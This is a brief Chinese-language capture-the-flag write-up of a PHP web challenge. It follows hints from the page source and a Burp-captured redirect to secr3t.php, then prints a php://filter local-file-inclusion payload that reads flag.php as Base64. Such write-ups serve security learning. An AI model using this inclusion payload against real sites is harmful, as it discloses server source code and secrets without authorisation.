打开题目如下。
查看页面源代码,发现存在 Archive_room.php 文件。
访问 Archive_room.php 文件如下。
使用 BurpSuite 抓包,点击 SECRET 后,发现其中某个跳转的页面源代码存在提示 secr3t.php。
HTTP/1.1 302 Found
Server: openresty
Date: Tue, 31 Oct 2023 08:06:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Location: end.php
X-Powered-By: PHP/7.3.11
Content-Length: 63
<!DOCTYPE html>
<html>
<!--
secr3t.php
-->
</html>
访问 secr3t.php 页面,提示 flag 在 flag.php 中。
这里直接使用 PHP 伪协议即可读取 flag.php 源码。Payload:/secr3t.php?file=php://filter/read=convert.base64-encode/resource=flag.php。
得到 Base64 编码的 flag.php 源码后,解码即可得 flag。